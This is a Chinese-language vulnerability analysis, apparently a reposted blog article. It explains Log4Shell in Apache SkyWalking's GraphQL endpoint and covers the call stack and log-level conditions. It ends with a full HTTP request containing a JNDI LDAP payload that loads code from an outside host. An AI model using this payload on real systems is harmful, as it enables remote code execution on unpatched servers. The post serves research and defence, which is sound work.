漏洞分析 | Apache Skywalking的log4shell分析

admin 2025年4月15日09:53:26评论6 views字数 3560阅读11分52秒阅读模式
朋友们,现在只对常读和星标的公众号才展示大图推送,建议大家把杂七杂八聊安全设为星标”,否则可能就看不到了啦~

漏洞分析 | Apache Skywalking的log4shell分析

0x01 触发点位置

graphql.GraphQL#parseAndValidate
漏洞分析 | Apache Skywalking的log4shell分析
调用堆栈:
parseAndValidate:504, GraphQL (graphql)lambda$parseValidateAndExecute$3:494, GraphQL (graphql)apply:-1981677561 (graphql.GraphQL$$Lambda$140)get:11, NoOpPreparsedDocumentProvider (graphql.execution.preparsed)parseValidateAndExecute:490, GraphQL (graphql)executeAsync:470, GraphQL (graphql)execute:401, GraphQL (graphql)execute:93, GraphQLQueryHandler (org.apache.skywalking.oap.query.graphql)doPost:83, GraphQLQueryHandler (org.apache.skywalking.oap.query.graphql)doPost:59, JettyJsonHandler (org.apache.skywalking.oap.server.library.server.jetty)service:707, HttpServlet (javax.servlet.http)service:107, JettyJsonHandler (org.apache.skywalking.oap.server.library.server.jetty)service:790, HttpServlet (javax.servlet.http)service:112, JettyJsonHandler (org.apache.skywalking.oap.server.library.server.jetty)handle:763, ServletHolder (org.eclipse.jetty.servlet)doHandle:551, ServletHandler (org.eclipse.jetty.servlet)nextHandle:233, ScopedHandler (org.eclipse.jetty.server.handler)doHandle:1363, ContextHandler (org.eclipse.jetty.server.handler)nextScope:188, ScopedHandler (org.eclipse.jetty.server.handler)doScope:489, ServletHandler (org.eclipse.jetty.servlet)nextScope:186, ScopedHandler (org.eclipse.jetty.server.handler)doScope:1278, ContextHandler (org.eclipse.jetty.server.handler)handle:141, ScopedHandler (org.eclipse.jetty.server.handler)handle:127, HandlerWrapper (org.eclipse.jetty.server.handler)handle:500, Server (org.eclipse.jetty.server)lambda$handle$1:383, HttpChannel (org.eclipse.jetty.server)dispatch:-11312317880 (org.eclipse.jetty.server.HttpChannel$$Lambda$137)dispatch:547, HttpChannel (org.eclipse.jetty.server)handle:375, HttpChannel (org.eclipse.jetty.server)onFillable:273, HttpConnection (org.eclipse.jetty.server)succeeded:311, AbstractConnection$ReadCallback (org.eclipse.jetty.io)fillable:103, FillInterest (org.eclipse.jetty.io)run:117, ChannelEndPoint$2 (org.eclipse.jetty.io)runTask:336, EatWhatYouKill (org.eclipse.jetty.util.thread.strategy)doProduce:313, EatWhatYouKill (org.eclipse.jetty.util.thread.strategy)tryProduce:171, EatWhatYouKill (org.eclipse.jetty.util.thread.strategy)run:129, EatWhatYouKill (org.eclipse.jetty.util.thread.strategy)run:375, ReservedThreadExecutor$ReservedThread (org.eclipse.jetty.util.thread)runJob:806, QueuedThreadPool (org.eclipse.jetty.util.thread)run:938, QueuedThreadPool$Runner (org.eclipse.jetty.util.thread)run:745, Thread (java.lang)
0x02 为什么只有这个点能触发
在org.apache.logging.log4j.spi.AbstractLogger#logIfEnabled方法中需要判断日志等级,只有上述那个点是log.warn
漏洞分析 | Apache Skywalking的log4shell分析
其他的点是LOGGER.debug,当进入到org.apache.logging.log4j.core.Logger.PrivateConfig#filter方法中,在配置文件中要求的是info级别400,这里传进来的是debug级别为500400小于500所以返回false
漏洞分析 | Apache Skywalking的log4shell分析
在org.apache.logging.log4j.spi.AbstractLogger#logIfEnabled中就没有进入到org.apache.logging.log4j.spi.AbstractLogger#logMessage中
漏洞分析 | Apache Skywalking的log4shell分析
0x03 数据包
POST /graphql HTTP/1.1Host: 127.0.0.1:12800User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0Accept: application/json, text/plain, */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/json;charset=utf-8Content-Length: 444Origin: http://x.x.x.x:8059DNT: 1Connection: closeReferer: http://x.x.x.x:8059/{"query":"query queryLogs($condition: LogQueryCondition) {queryLogs(condition: $condition) {totallogs {serviceId${jndi:ldap://192.168.22.33:1389/basic/base64/b3BlbiAtYSBDYWxjdWxhdG9yCg==}serviceNameisErrorcontent}}}","variables":{"condition":{"metricName":"test","state":"ALL","paging":{"pageSize":10}}}}

END

原文始发于微信公众号(杂七杂八聊安全):漏洞分析 | Apache Skywalking的log4shell分析

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年4月15日09:53:26
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞分析 | Apache Skywalking的log4shell分析https://cn-sec.com/archives/3957182.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息